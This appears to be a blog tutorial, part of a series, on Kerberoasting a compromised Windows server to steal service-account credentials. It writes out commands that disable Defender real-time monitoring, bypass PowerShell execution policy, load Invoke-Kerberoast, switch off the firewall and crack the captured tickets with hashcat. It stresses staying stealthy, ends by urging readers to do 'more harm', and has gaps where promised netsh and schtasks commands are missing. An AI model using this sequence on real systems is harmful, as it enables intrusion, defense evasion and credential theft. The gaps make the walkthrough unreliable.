Are you Attacking Web Apps Admin Panels The Right Way?

You should start here: Part_1

Picking up from where we left off in part two. This time, we are on a Windows Server. Personally, I’m not a big fan of Windows Servers, and once you try to become a professional Red Teamer, you will understand why. Today, we will learn about a very basic and simple Active Directory attack, a topic not much talked about in the Bug Bounty community since most reports involve just web application vulnerabilities.

Tree

• Hashcat
• Service Principal Name(SPN)
• Powershell
• Invoke-Kerberoast.ps1

Unlike Linux servers, because of the complexity of the Windows ecosystem, they are too many different directions to go from here, which is why I will go for the simplest path. Everything will depend on the group policies that were given to the server. Your best bet will be to enumerate everything. We want to be as stealthy as possible, which is why we are going to do everything manually, without using tools like Mimikatz that can trigger alerts and get you caught. You will land in CMD, and many directories may be locked, which is why we will use PowerShell to perform enumeration.

CMD.exe

First thing we need to check for is the current firewall profile using the netsh command.

In this case, the current firewall profile is active so let’s have a closer look at the firewall rules. We can list firewall rules with the netsh command using the following syntax:

Some Enumeration 🕵

The output generated by schtasks includes a lot of useful information such as the task to run, the next time it is due to run, the last time it ran, and details about how often it will run.

Kerberoasting tools typically request RC4 encryption when performing the attack and initiating TGS-REQ requests. This is because RC4 is weaker and easier to crack offline using tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256. RC4 (type 23) hashes begin with $krb5tgs$23$* while AES-256(type 18) start with $krb5tgs$18$*.

Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within the Active Directory (AD). The general concept is to request service tickets (TGS). These tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. Any domain account that can request a TGS is what we need, which is anyone since no special privileges are required. To do such of attack will be using this tool and the commands below.

• https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

C:\Users\webapp> powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\webapp> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\users\webapp\desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
PS C:\Users\webapp> powershell -nOp -ExeC bypass
PS C:\Users\webapp> Import-Module .\Invoke-Kerberoast.ps1
PS C:\Users\webapp> Get-Module
ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Script     0.0        k
Manifest   3.1.0.0    Microsoft.PowerShell.Management     {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Con...
Manifest   3.1.0.0    Microsoft.PowerShell.Utility        {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script     2.0.0      PSReadLine                          {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Pro Bonus Tip 💸

If for some evil reason, you have Administrator rights you can use this command to turn off the Firewall

netsh advfirewall set allprofiles state off

./Invoke-Kerberoast.ps1

The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number.

Save the hash to hash.txt and run the command below to crack the password using Hashcat. John the ripper can also be used for this task.

hashcat -m 13100 --force <TGSs_file> <worldlist.txt>

Summary

From here, we can move on to what is known as the Kerberos silver ticket attack. Keep in mind that this can only be used on one service (such as MSSQL). It will give you administrator rights only to this service, not to any AD service. You will be able to enable xp_cmd, which will let you spawn processes and view all databases in the DB. Now that you have an UserName and Password, you can go back to Kali Linux and more harm. AD attacks are infinite, and this was something very basic to give you a start. I hope you like it, and if you are interested in these kinds of articles, don’t forget to add me to your mailing list